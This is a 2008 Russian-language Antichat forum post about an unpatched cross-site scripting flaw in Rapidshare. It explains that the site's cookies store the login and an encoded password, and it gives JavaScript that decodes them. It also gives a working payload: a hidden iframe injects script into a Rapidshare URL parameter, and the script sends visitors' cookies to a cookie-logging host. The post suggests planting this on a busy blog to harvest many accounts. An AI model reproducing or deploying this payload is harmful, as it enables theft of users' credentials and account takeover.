ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Оффтоп > Болталка
   
 
 
Опции темы Поиск в этой теме Опции просмотра

[XSS] Rapidshare
  #1  
Старый 15.07.2008, 18:08
Аватар для Wh(te
Wh(te
Новичок
Регистрация: 09.06.2008
Сообщений: 4
Провел на форуме:
423813

Репутация: 25
По умолчанию [XSS] Rapidshare

Nktpro любезно сообщил о последней XSS уязвимости на Rapidshare которая до сих пор не закрыта, несмотря на то , что о ней была оповещена администрация файлообменника еще месяц назад пользователями сайта.
Но на что Вы можете расчитывать от людей, которые хранят логин и пароль в cookie?
Да , убедитесь сами: Rapidshare cookie имеют вид: user=12345-%36%37%38%39%30.
В Javascript,
cookie = "username=" + login + "-" + pwd.replace(/./g, function(s) "%" + (s.charCodeAt(0).toString(16)))
Поэтому этих cookie достаточно для получения доступа
var [login, pwd] = cookie.replace(/.*=/,'').split("-"), pwd = unescape(pwd);

Это значит следующее , если включить этот код в сообщение в блоге который посещается множеством пользователей rapidshare , можно получить огромное колличество аккаунтов.


var injection = "<script>(" + (function() {

new Image().src = "http://evil.hackademix.net/cookielogger/rapidshare/?c=" +

escape(document.cookie);

}) + ")()</scr" + "ipt>"

var iframe = document.body.appendChild(document.createElement(" iframe"));

iframe.style.visibility = "hidden";

iframe.src = "http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345%22" +

encodeURIComponent(injection);




15\07\2008 ©http://hackademix.net/

Последний раз редактировалось Wh(te; 15.07.2008 в 19:52..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Rapidshare xss is still unpatched Wh(te Forum for discussion of ANTICHAT 0 15.07.2008 16:59
Rapidshare Tools Collection 2008 + mff Soft - Windows 7 20.06.2008 15:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ